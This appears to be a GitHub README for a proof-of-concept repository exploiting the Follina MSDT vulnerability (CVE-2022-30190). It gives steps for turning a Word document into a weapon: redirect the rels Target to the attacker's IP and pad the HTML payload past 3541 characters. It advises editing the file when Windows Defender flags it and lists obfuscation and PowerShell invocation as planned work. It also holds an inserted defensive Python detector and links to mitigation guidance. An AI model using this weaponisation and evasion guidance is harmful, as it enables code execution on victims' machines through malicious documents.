drgreenthumb93 / CVE-2022-30190-follina

Just another PoC for the new MSDT-Exploit


CVE-2022-30190-follina

To edit the document, open the .docx with 7z, xarchiver or any other zip tool and change the Target value in word\_rels\document.xml.rels to your IP.

The HTML payload must contain at least 3541 characters before the window.location.href call, and those characters must sit inside the script tag. The current file uses about 9000, just to be sure.
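To go with the rels edit described above, here is an added example (not part of this repo) that a defender can run over a .docx to spot the indicator the edit produces: an oleObject relationship in word/_rels/document.xml.rels with TargetMode="External" whose Target is an http(s) URL. The two sample documents, the 192.0.2.10 address and the file names are constructed for this example.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

RELS_PATH = "word/_rels/document.xml.rels"
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")


def find_external_ole_targets(docx_bytes):
    """Return [(rId, target)] for every oleObject relationship in the main
    document rels that points to a remote http(s) URL. A benign document
    embeds OLE objects inside the package; a linked object fetched from a
    web server is the pattern the README's rels edit creates."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if RELS_PATH not in zf.namelist():
            return hits
        root = ET.fromstring(zf.read(RELS_PATH))
    for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
        if rel.get("Type") != OLE_REL_TYPE or rel.get("TargetMode") != "External":
            continue
        target = rel.get("Target", "")
        if urlsplit(target).scheme in ("http", "https"):
            hits.append((rel.get("Id"), target))
    return hits


def build_sample_docx(rels_xml):
    """Build a minimal docx-like zip (constructed for this example only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr(RELS_PATH, rels_xml)
    return buf.getvalue()


# Constructed rels files: one clean, one with an external OLE link.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
</Relationships>"""

SUSPICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId5" Type="{OLE_REL_TYPE}" Target="http://192.0.2.10/index.html" TargetMode="External"/>
</Relationships>"""

if __name__ == "__main__":
    print(find_external_ole_targets(build_sample_docx(BENIGN_RELS)))      # []
    print(find_external_ole_targets(build_sample_docx(SUSPICIOUS_RELS)))  # [('rId5', 'http://192.0.2.10/index.html')]
```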

More about the exploit:

https://www.borncity.com/blog/2022/06/01/follina-schwachstelle-cve-2022-30190-warnungen-erste-angriffe-der-status/ (German)
https://packetstormsecurity.com/files/167317/msdt-poc.txt

Mitigation and workaround:

https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

Windows Defender already detects this as a security flaw (Trojan:Win32/Mesdetty.D), so you will have to edit the file if it gets flagged.

REMEMBER: ONLY FOR EDUCATIONAL PURPOSES!!! ;)

To-Do:

  • Obfuscation
  • Invoke PS Script
